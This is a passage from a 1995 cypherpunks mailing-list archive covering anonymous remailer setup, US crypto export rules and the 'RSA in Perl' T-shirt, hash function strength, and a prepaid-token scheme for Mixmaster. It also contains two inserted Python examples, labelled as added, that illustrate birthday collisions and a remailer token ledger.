NSA/Dept. of State draw their lines, and to _force_ them to draw lines
where they'd rather retain flexibility.  At the very least, we can point
out the rather strange ideas they have about what constitutes speech, for
the PR value, during the splashes of media attention silly CJR rulings
generate.

Even more useful: other things remaining equal, a rigid agency is safer
to deal with than one that retains the flexibility to selectively harass.


Richard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: +*+ Billy Smith <bsmith@gears.efn.org>
Date: Fri, 27 Oct 1995 11:19:19 +0800
To: hroller <hroller@metronet.com>
Subject: Re: Anonymous Account Help
In-Reply-To: <Pine.HPP.3.90.951026075541.25974C-100000@fohnix.metronet.com>
Message-ID: <Pine.3.89.9510260836.A28986-0100000@gears.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995, hroller wrote:

> I have been having problems trying to set up an account at
> alpha.c2.org. I have followed all the instructions but am still unable to
> get a reply or anything that works right. What am I doing wrong? This is 
> what I have done so far. I am about to pull my hair out. I have been 
> working on this for 2 days now. Anyway, 
> 
> 1. Created a Reply Block like this:  
> Request-Remailing-To: hroller@metronet.com 
> 
> 2. I then encrypted it with remailer@replay.com's Public Key. I prepended it
> with the "Encrypted: PGP".  
> 
> 3. I then created the following message: 
> 
> From: hroller@alpha.c2.org 
> Password: MyPassword 
> Reply-Block: 
> ::
> Anon-To: remailer@replay.com 
> 
> ::
> Encrypted: PGP 
> -------Begin PGP Message---------- 
> "The Encrypted Reply Block Message"  
> ------End PGP Message------------- 
> 
> 4. I then sent it to "alias@alpha.c2.org".  
> 
> Then I wait. But never get anything from alpha.c2.org.  I have gotten 
> some anonymous messages from replay, but they are still encrypted so 
> I don't know what it is sending me. Any help you can supply would be
> greatly appreciated.
> 

Hmm, if you got an encrypted return from alpha.c2.org that means that 
your request worked. Use the password you sent to them to decrypt the msg 
you received... I spent a lot of days waiting for something to happen when 
I first registered, I think the name or password I was trying to use had 
already been used. If that is the case, alpha.c2.org doesn't respond at 
all. It took me awhile to figure that out. Once I selected a name and 
password that no one else was using... It worked...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 27 Oct 1995 04:16:52 +0800
To: hroller@metronet.com (hroller)
Subject: Re: Anonymous Account Help
In-Reply-To: <Pine.HPP.3.90.951026075541.25974C-100000@fohnix.metronet.com>
Message-ID: <199510261609.JAA27301@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Then I wait. But never get anything from alpha.c2.org.  I have gotten 
> some anonymous messages from replay, but they are still encrypted so 
> I don't know what it is sending me. Any help you can supply would be
> greatly appreciated.
> 

	Mail to your alias is encrypted using pgp -c and your
password, I think.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 03:50:35 +0800
To: cypherpunks@toad.com
Subject: Re: Welcome to cypherpunks
Message-ID: <acb4fc6a06021004fab7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:16 PM 10/26/95, Steven Weller wrote:

>Well, the Welcome message says this:

Actually, not "the" Welcome message, but a particular instance of it,
namely, the instance directed at the new subscriber (in this case,
cypherpunks@toad.com was the new subscriber).


>->If you ever want to remove yourself from this mailing list,
>->you can send mail to "Majordomo@toad.com" with the following command
>->in the body of your email message:
>->
>->    unsubscribe cypherpunks cypherpunks@toad.com
>
>So it is but a small leap of logic to remove the 'un' in order to
>subscribe, since to my knowledge the Welcome message does not tell you how
>to subscribe. A human interface problem?

Except that the list would _have_ to have been subscribed to itself
_before_ that particular Welcome message would have gone out.

Sort of a binding issue. I would prefer the Welcome message to always say
the command is:

     unsubscribe cypherpunks yournamehere

and

     subscribe cypherpunks yournamehere



But this is presumably a Majordomo feature. In any case, let's hope
subscribing the list to itself is not a trend.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 04:47:59 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <acb4fe74070210047537@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:30 AM 10/26/95, Jeff Weinstein wrote:

>  Should they also reject the same content (RSA-PERL) delivered
>in any of the following ways:
>
>        Printed on paper
>        Printed on paper in OCR font
>        Printed on paper in barcode
>        Printed on paper with magnetic ink (like checks)
>
>  The lines being drawn here seem very arbitrary.

I'll try to think like a bureaucrat responsible for actually trying to
limit the export of weapons, munitions, cluster bombs, nerve gases, secure
communications gear, crypto tools, etc.

My test would be this:

"Is the product actually usable by an adversary or helpful to them in any
major way as a tangible product?"

(I have no idea of what their review criteria are, just suggesting some
plausible considerations.)

How different products get evaluated by these criteria:

* cruise missiles -- Yes.

* designs for cruise missiles -- Yes. Blueprints, especially. Books are
more problematic, as the U.S. has no tendency to screen books for
publication, and no border checks for books. (Not that outgoing luggage
ever gets checked anyway.)

* functional crypto systems, such as RSA products or PGP -- Yes, thinking
as a bureaucrat. (I won't argue the effectiveness of such steps, or the
ultimate futility of trying to control software export.)

* "RSA in Perl," even in machine-readable form. I would not block export of
it, as it is not a "usable system" (no key management, unwieldy to use).
The proof of the pudding: how many people are using "RSA in Perl" to
actually communicate? How many Pablo Escobars or Saddam Husseins are likely
to ever use it?

(If the argument is that the few lines of RSA in Perl "give away" the secret
of RSA, this is bogus. The core steps are widely, widely (did I say
"widely") known, and are standard programming examples. One of the first
things I did in Mathematica, several years ago, was to code up "RSA in
Mathematica"...took about 15 lines, without much effort to compact it.)

* "RSA in Perl" on an unreadable t-shirt. Yes. Yes, thinking as a
bureaucrat I would certainly approve it. Or try to lose it, return it
unopened, etc., knowing full well the CJR was being done as a publicity
stunt (well, isn't it?) and that reporters were waiting to make the State
Department look foolish by reporting: "State Department Rules "Munitions
T-Shirt" May Be Exported!"

(Or to look just as foolish by rejecting it.)


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 27 Oct 1995 06:17:50 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <308FBACB.581A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> The appellate court has already ruled that restrictions on export of
> printed materials do not violate First Amendment rights.  I wrote up one
> of these, the Posey case, in
> <URL:http://www.portal.com/~hfinney/cryp_export2.html>.  In that instance
> the materials being exported were some manuals obtained from the US
> government itself via the Freedom of Information Act!  The law in
> question was not actually the ITARs but rather another one which applied
> specifically to exports to South Africa, and which did not have the
> public domain exemption.  The point though is that the court did not agree
> that the First Amendment was relevant since the restrictions were
> specifically on export and did not have any effect on domestic
> distribution of the information.

  The ITARs are currently keeping us (Netscape) from distributing
our US-only products to people within the United States.  We have
asked for clarification from the government about network distribution,
such as how much verification of location and citizenship of the
recipient we must do, and have yet to receive a response.  That
makes it more than just an export issue, at least for us.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 26 Oct 1995 16:53:36 +0800
To: cypherpunks@toad.com
Subject: Bill Gates on anonymity
Message-ID: <199510260845.JAA17457@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


BEGIN QUOTE

I'm not suggesting we do away with all forms of anonymity. I can imagine electronic 
communities where anything goes and no one can trace the real origin of 
information - or verify its authenticity. 

You would enter such a community - by deciding to read or watch the information
posted there - at your own risk, and if people said offensive or untrue things to 
you, your only recourse would be to set the record straight in the same forum. 

Consenting adults should be entitled to participate in this kind of community. But 
kids certainly should not. 

END QUOTE

The full text is at http://nytsyn.com/live/Gates/270_092795_082520_2997.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 26 Oct 1995 23:53:01 +0800
To: cypherpunks@toad.com
Subject: MD4-derived hash functions
Message-ID: <01HWW4G5KUE69LV2GV@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 24 Oct 1995 13:14:41 -0400
>From: hallam@w3.org
>Subject: Re: MD5 weakness

>Ron has not mentioned such an event to me and if that were the case I would
>seriously doubt that he would not have been told about it. The only comment he
>generally makes is that he wrote MD5 because "MD4 was making me nervous".

In the MD5 RFC, I seem to recall the statement that MD4 was trading
off too much strength for additional speed.  However, sometime
around that time, it came out that there were attacks on two-round
variants of MD4, which is the stated reason for the development of
RIPE-MD.  Does anyone know whether Rivest was motivated to design
MD5 by the partial attacks on MD4, or whether those came later?
(This is totally idle curiosity.)

>NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is preferable
>in many ways to MD5, it has a different approach to extending the scheduling and
>resist differential cryptanalysis. There is a problem with the compressor
>function of MD5 which I dislike.

All of the well-known software hash functions seem to be based on
MD4 these days, but that doesn't mean much about the security of
MD4--3DES with three independent keys looks pretty strong, as does
3DES with two independent keys, but that doesn't mean that single
DES is a strong enough cipher for modern applications.

One issue that exists with MD5, but not with SHA or the longer hash
versions of Haval, is that MD5 has only a 128 bit hash function
output, which corresponds loosely to having a 64-bit key.  This
implies that a wealthy enough opponent could determine a pair of MD5
inputs that collide, and conceivably use this in an attack.  I think
we should stick to 160 bit or longer hashes for future designs.
(See P. van Oorschot and M. Wiener, "Parallel Collision Search with
Application to Hash Functions and Discrete Logarithms," in the
proceedings of the 1994 Fairfax Conference, for example).

As an aside, what hash functions are there out there that look
reasonably strong, have hash outputs of at least 160 bits, and
aren't based on MD4?  Some of the Snefru variants with many passes
(eight?) come to mind, and the GOST hash function fits all the
criteria, except I have a hard time convincing myself it's as strong
as it claims to be.  Is there a generic construction for
arbitrary-length hash functions from good block or stream ciphers?

>	Phill

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI+Mc0Hx57Ag8goBAQFJ9gP/VMvNefSm77prSY/NMbJfGO1EVmQrUAHn
kEQEse+cXiaoJTe7njxUqycuDX0PN09C4XhNVOQJ6IBpCPZOKQMiXsI9FwAfjGWb
mibwSfzyiXwxny1kYgfDCffS8KwdlWiVjxj1+MhvqhGQnxPsVA6UVrSCyAyHPZVJ
UTXUWBJlJho=
=2Pti
-----END PGP SIGNATURE-----
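
The arithmetic behind "a 128 bit hash output corresponds loosely to having
a 64-bit key" in the message above, as an added example that is not part of
the original post: a birthday search on SHA-256 truncated to n bits needs
about 2^(n/2) evaluations.  Truncated SHA-256 is a stand-in chosen so the
search finishes quickly; this is not MD5 and not the parallel method of the
cited paper, and all function names and messages are constructed here.

```python
"""Birthday-bound demonstration on a truncated hash (constructed inputs)."""
import hashlib
import math


def truncated_hash(data: bytes, bits: int) -> int:
    """Return the top `bits` bits of SHA-256(data) as an integer."""
    if not 1 <= bits <= 256:
        raise ValueError("bits must be between 1 and 256")
    value = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return value >> (256 - bits)


def find_collision(bits: int):
    """Hash distinct constructed messages until two share an n-bit digest.

    Returns (first_message, second_message, evaluations).  The table of
    digests seen so far is what makes the search cost ~2^(n/2) rather
    than the ~2^n needed to hit one fixed target digest.
    """
    seen = {}
    counter = 0
    while True:
        message = b"constructed-message-%d" % counter
        digest = truncated_hash(message, bits)
        counter += 1
        if digest in seen:
            return seen[digest], message, counter
        seen[digest] = message


def expected_collision_work(bits: int) -> float:
    """Expected evaluations before the first collision: sqrt(pi/2 * 2^bits)."""
    return math.sqrt(math.pi / 2) * 2.0 ** (bits / 2)


def scaling_table(sizes=(16, 24, 32)):
    """Measure collision cost at several output sizes.

    Returns a list of (bits, measured_evaluations, expected_evaluations).
    """
    rows = []
    for bits in sizes:
        _, _, evaluations = find_collision(bits)
        rows.append((bits, evaluations, expected_collision_work(bits)))
    return rows


if __name__ == "__main__":
    print("bits  measured  expected")
    for bits, measured, expected in scaling_table():
        print(f"{bits:4d}  {measured:8d}  {expected:10.0f}")
    # Extrapolate the same formula to the sizes discussed in the message.
    for bits in (128, 160):
        work = math.log2(expected_collision_work(bits))
        print(f"{bits}-bit output: about 2^{work:.1f} evaluations")
```

Each extra 8 bits of output multiplies the measured cost by roughly 16, so
going from 128 to 160 bits raises the collision cost by a factor of 2^16.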




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 27 Oct 1995 15:05:48 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: CJR returned to sender
In-Reply-To: <acb4fe74070210047537@[205.199.118.202]>
Message-ID: <199510261708.KAA01761@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> * "RSA in Perl," even in machine-readable form. I would not block export of
> it, as it is not a "usable system" (no key management, unwieldy to use).
> The proof of the pudding: how many people are using "RSA in Perl" to
> actually communicate? How many Pablo Escobars or Saddam Husseins are likely
> to ever use it?

	They have, however (apparently) blocked export of the
"snuffle" source code, which is 10 lines of C. Is snuffle, in its 10
lines of C a "usable system"? I would imagine not.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 27 Oct 1995 03:50:26 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: CJR returned to sender
In-Reply-To: <199510261423.HAA10098@jobe.shell.portal.com>
Message-ID: <199510261429.KAA11299@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> But lines are always arbitrary.
[...]
> This whole exercise in line-drawing doesn't seem
> that productive to me.

The purpose of this exercise is to find out where the arbitrary line
is, and to note that it is a silly and idiotic place to put the line,
in the hopes of eliminating the line and the law with it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 27 Oct 1995 15:49:34 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <acb4d64d11021004827b@[137.110.24.250]>
Message-ID: <199510261443.KAA25683@homeport.org>
MIME-Version: 1.0
Content-Type: text


Lance Cottrell wrote:

| How open is the protocol? Is there an API for it? Does anyone know how big
| the coins are? There will have to be room for one per header in Mixmaster.
| Do they vary in size, or are all coins identical? There is so much stuff to
| try to keep track of all at once! :/

	If the coin is bigger than a Mix header has room for, does it
have room for an arbitrary token?

	I send a message to the mixmaster I'd like to use, containing
a coin and a large arbitrary number.  I then put that number in a list
I maintain of the tokens I can spend with that mixmaster.

	The mixmaster cashes the coin at once[1], and puts my number
into a list of 'paid' tokens it will accept.

	When I want to spend the token, I put that in the message
header block.   Since it's smaller than the coin, it's easier to put in
the header than the coin.

	This scheme also reduces mapability between the coin and the
message, since they are not strongly correlated in time as they would
be if they were included in the message.  This seems to be a stronger
win than the size benefit that caused me to suggest this.

	[1] Other than the time mapping win, I could also see spending
a few bucks at the start of each month to be able to use any
mixmaster.  The mixmasters would, by cashing my coins early, win on
the float between the time they get my money and the time they provide
service.  Icing on the cake.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
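
The prepaid-token scheme described in the message above, as an added
example that is not part of the original post and not Mixmaster code: the
remailer cashes the coin when it arrives, lists the sender's random number
as paid, and later accepts that number once.  ToyBank, TokenLedger, the
16-byte token size and storing only a SHA-256 fingerprint of each token are
assumptions of this example; the 90-day lifetime follows the "forget" tokens
older than 3 months idea raised in a reply later in this thread.

```python
"""Prepaid single-use tokens for a remailer (hypothetical names throughout)."""
import hashlib
import secrets

TOKEN_BYTES = 16                      # assumed size: small enough for a header
TOKEN_LIFETIME = 90 * 24 * 3600       # seconds, roughly three months


class ToyBank:
    """Constructed stand-in for the coin issuer: each serial cashes once."""

    def __init__(self, issued_serials):
        self._unspent = set(issued_serials)

    def cash(self, serial: str) -> bool:
        if serial in self._unspent:
            self._unspent.remove(serial)
            return True
        return False                  # unknown or already-spent coin


def new_token() -> bytes:
    """Client side: the 'large arbitrary number' sent along with the coin."""
    return secrets.token_bytes(TOKEN_BYTES)


def fingerprint(token: bytes) -> bytes:
    """The ledger keeps this, not the token, so a copied ledger is not spendable."""
    return hashlib.sha256(token).digest()


class TokenLedger:
    """Remailer side: the list of 'paid' tokens it will accept."""

    def __init__(self, cash_coin, lifetime=TOKEN_LIFETIME):
        self._cash_coin = cash_coin   # callable(coin) -> bool, e.g. ToyBank.cash
        self._lifetime = lifetime
        self._paid = {}               # fingerprint -> expiry time

    def purge(self, now: int) -> int:
        """Drop expired tokens so the list does not grow forever."""
        expired = [k for k, expiry in self._paid.items() if expiry <= now]
        for key in expired:
            del self._paid[key]
        return len(expired)

    def deposit(self, coin: str, token: bytes, now: int) -> bool:
        """Cash the coin at once and record the token as paid."""
        if len(token) < TOKEN_BYTES:
            raise ValueError("token too short to be unguessable")
        self.purge(now)
        key = fingerprint(token)
        if key in self._paid:
            return False              # refuse before cashing: coin stays unspent
        if not self._cash_coin(coin):
            return False              # bad or double-spent coin buys nothing
        self._paid[key] = now + self._lifetime
        return True

    def spend(self, token: bytes, now: int) -> bool:
        """Accept a token found in a message header exactly once."""
        self.purge(now)
        return self._paid.pop(fingerprint(token), None) is not None

    def outstanding(self) -> int:
        return len(self._paid)


if __name__ == "__main__":
    bank = ToyBank({"coin-A", "coin-B"})          # constructed coin serials
    ledger = TokenLedger(bank.cash)
    token = new_token()
    print("deposit:", ledger.deposit("coin-A", token, now=0))
    print("first use:", ledger.spend(token, now=3600))
    print("replayed use:", ledger.spend(token, now=3601))
```

Because the coin is cashed at deposit time and the token is spent later, the
remailer never sees the coin and the message together.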





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 27 Oct 1995 11:34:04 +0800
To: shgoh@ncb.gov.sg (Goh Seow Hiong)
Subject: Re: symmetric key algorithms
In-Reply-To: <Pine.3.89.9510261019.A29735-0100000@gallery.ncb.gov.sg>
Message-ID: <199510261450.KAA25716@homeport.org>
MIME-Version: 1.0
Content-Type: text



| Could anyone comment on the acceptability and reliability of the 
| SAFER algorithm, in comparison with other algorithms such as IDEA,
| Triple-DES, DES, RC4, ....  Has there been any comparison paper 
| written on the pros and cons of the different symmetric key algorithms?

	There was a weakness shown in SAFER K-64 by Lars Knudsen at
Crypto '95.  It involved a related key chosen plaintext attack, which
derived from SAFER's XOR'ing the data with the key too often.

	It would make me nervous about using SAFER, but I'm just an
amateur at the crypto stuff.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 27 Oct 1995 10:48:39 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: rejection of CJR
Message-ID: <m0t8Tqi-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


I happened to speak to Mr. Capilino at the Office of Defense Trade
Controls this morning, and mentioned that the Commodity Jurisdiction
Request for the T-Shirt had been returned and read him the message to
that effect.

He told me that that was the wrong address for mail, since it was used
only for courier deliveries, and that they have stopped accepting even
courier deliveries there since the Oklahoma City bombing.

He suggested that those who want to apply for the Commodity
Jurisdiction determination should call him at 703-875-7396.  He will fax 
the current information on how to submit a CJR to anyone upon request.  
He did not say so, but I rather think he looks forward to getting the
T-Shirt request.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 27 Oct 1995 06:30:35 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] Perrynoia in the Comics
Message-ID: <199510261804.LAA03266@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 AM 10/26/95 -0400, you wrote:
>
>Alan Olsen writes:
>> This has no real crypto relevance, but some anarchistic relevance.
>
>Alan;
>
>As much as I found the comment interesting, it probably belonged
>somewhere like libernet-d, not here on cypherpunks.

I posted it on Cypherpunks because it is the only list I take where such
political views are even mentioned.  I thought that people on the list would
enjoy it.  I prefaced it with [noise] so that people who would object would
skip over it.  Evidently that disclaimer is not enough anymore.

>[I'm posting this in public, as I do about one in ten such messages,
>so that a wider audience of people will be discouraged from posting
>such things in advance. Don't bother mailing me a message saying "you
>are adding to the noise yourself, why not mail in private" -- I do
>that 90% of the time. Sometimes the nose levels rise enough that I
>feel that a few public mentions would do some good.]

I am not certain as to the "nose levels" as I thought they stopped
publishing a number of months back.

I think you need to get some treatment for those hardening of the orthodixies.

|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 27 Oct 1995 09:09:34 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb57c2b010210043b15@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I think the idea of a token has come up before. I think it is a good idea.
The token should have some expiration information in it so the remailer
need not keep it around forever (or it could just "forget" all tokens older
than 3 months). Right now there is not much spare room in the Mixmaster
headers.

There are several ideas for improvements in Mixmaster that will require the
adoption of an incompatible message format. I plan to collect them and
implement them all at once. One of the ideas is an expiration date in the
message to keep it from ever being replayed (even after the remailer
expires its record of the message ID).

        -Lance

At 7:43 AM 10/26/95, Adam Shostack wrote:
>Lance Cottrell wrote:
>
>| How open is the protocol? Is there an API for it? Does anyone know how big
>| the coins are? There will have to be room for one per header in Mixmaster.
>| Do they vary in size, or are all coins identical? There is so much stuff to
>| try to keep track of all at once! :/
>
>        If the coin is bigger than a Mix header has room for, does it
>have room for an arbitrary token?
>
>        I send a message to the mixmaster I'd like to use, containing
>a coin and a large arbitrary number.  I then put that number in a list
>I maintain of the tokens I can spend with that mixmaster.
>
>        The mixmaster cashes the coin at once[1], and puts my number
>into a list of 'paid' tokens it will accept.
>
>        When I want to spend the token, I put that in the message
>header block.   Since it's smaller than the coin, it's easier to put in
>the header than the coin.
>
>        This scheme also reduces mapability between the coin and the
>message, since they are not strongly correlated in time as they would
>be if they were included in the message.  This seems to be a stronger
>win than the size benefit that caused me to suggest this.
>
>        [1] Other than the time mapping win, I could also see spending
>a few bucks at the start of each month to be able to use any
>mixmaster.  The mixmasters would, by cashing my coins early, win on
>the float between the time they get my money and the time they provide
>service.  Icing on the cake.
>
>Adam
>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------
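
[Added example, not part of the original messages and not Mixmaster code.] A sketch of the prepaid-token scheme from the quoted proposal combined with the two expirations suggested in the reply: tokens are forgotten after about three months, and each message carries its own expiration so the message-ID record can be purged without reopening a replay window. The class, method and field names are assumptions, and the expiration field is assumed to be covered by the message's encryption so it cannot be altered in transit.

```python
import secrets

TOKEN_LIFETIME = 90 * 24 * 3600   # seconds; "forget" tokens older than ~3 months


def new_token():
    """The sender's 'large arbitrary number': 128 random bits, hex-encoded."""
    return secrets.token_hex(16)


class Remailer:
    """Hypothetical ledger for one remailer (names are assumptions)."""

    def __init__(self, token_lifetime=TOKEN_LIFETIME):
        self.token_lifetime = token_lifetime
        self.paid = {}     # token -> time at which the token is forgotten
        self.seen = {}     # message ID -> that message's own expiration time
        self.cashed = []   # coins redeemed; stand-in for the bank

    def deposit(self, coin, token, now):
        """Cash the coin at once and list the token as paid."""
        if len(token) < 32:
            raise ValueError("token too short to be unguessable")
        if token in self.paid:
            raise ValueError("token already registered")
        self.cashed.append(coin)
        self.paid[token] = now + self.token_lifetime

    def purge(self, now):
        """Drop expired tokens and the IDs of messages that can no longer
        be accepted anyway, so neither table grows without bound."""
        self.paid = {t: e for t, e in self.paid.items() if e > now}
        self.seen = {m: e for m, e in self.seen.items() if e > now}

    def relay(self, msg_id, token, expires, now):
        """Decide what to do with one incoming message."""
        self.purge(now)
        if expires <= now:
            # Checked first: this is what makes purging self.seen safe.
            return "expired"
        if msg_id in self.seen:
            return "replay"
        if token not in self.paid:
            return "unpaid"
        del self.paid[token]          # each token buys exactly one message
        self.seen[msg_id] = expires   # remembered only until the message expires
        return "relayed"


if __name__ == "__main__":
    r = Remailer()
    tok = new_token()                      # constructed sample values
    r.deposit("coin-1", tok, now=0)
    print(r.relay("m1", tok, expires=1000, now=10))    # first delivery
    print(r.relay("m1", tok, expires=1000, now=20))    # same message again
    print(r.relay("m1", tok, expires=1000, now=2000))  # after the ID was purged
```

Because the token is deposited separately from the message that later spends it, the ledger never stores anything linking the coin to a message ID.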






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 27 Oct 1995 11:04:32 +0800
To: drehm@wamu.brandywine.american.edu
Subject: Diane Rehm Show just ended
Message-ID: <9510261522.AA07260@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


You just finished a show on terrorism (WAMU, 10-11am, 10/26/95).  Thank you.

Some of your callers said most of what I would have said and I found that
pleasing, since I wasn't able to call in.

However, there was a theme which kept coming up and which wasn't addressed
specifically.  You might hold it in mind for future shows on terrorism:

	The FBI representative was saying that the goal is to *prevent*
	terrorism, not just to investigate and prosecute crimes after the
	fact.  I heard Director Freeh (on 10/19 on All Things Considered)
	say something similar -- that the FBI's job was to protect the
	people (which can be translated into "prevent terrorism").



This seems to be a major problem and perhaps the source of the concern
about civil liberties.

Terrorism might be a product of an organized, identified group and
infiltration of that group might enable the FBI to prevent acts of
violence.  Of course, the permission to infiltrate suspicious groups has
been used in the past to justify infiltration of non-violent but unpopular
groups like the Sanctuary Movement.

However, many of our recent terrorist acts appear to be the result of
individual actions -- not those of organized groups.  [Unabomber, OK City,
train derailment] Infiltration is out of the question in such cases.  The
only way to prevent such acts is to put the entire population of the US
under surveillance -- an authentic instance of Big Brother from 1984.

The conclusion to me is that we can not task the FBI with the job of
prevention of terrorism.  I suspect that we must insure that the FBI is
formally and carefully restricted to the job of investigating and
prosecuting crimes once they occur -- allowing the threat of almost certain
prosecution to serve as a prevention -- rather than with the impossible job
of prevention of such crimes.

		------------------------------

Meanwhile, there was one question I had that no one answered:

I didn't like history much as a student, but I vaguely remember other
periods of domestic terrorism: bombings in the early 1900s, acts of
violence associated with the labor movement, sabotage during WW-I conducted
by German agents.  There may have been many others.  This seems to be a
feature of life -- nothing recent, nothing special, frightening from its
news coverage but not a serious threat to any one individual (because of
the actual statistics around the threat -- comparing my chance of injury
due to auto accident, plane flight or terrorist act (for example)).  It
would be interesting to know why we had the pause in terrorism during the
Cold War -- or, for that matter, if we actually did.  Could it be that the
apparent return of terrorism is actually a perception rather than a fact --
as a result of shift in focus of the news media?

 - Carl



 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 27 Oct 1995 10:01:09 +0800
To: cypherpunks@toad.com
Subject: I resubmitted the CJR
Message-ID: <199510261833.LAA24364@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I have been told by several people that I did it wrong. Apparently
there are two addresses: one for mail, and one for couriers. The first
time, I sent it by mail to the courier address. This time, I also sent
a fax. From what I've heard, I should be receiving a tracking number
within a few days.

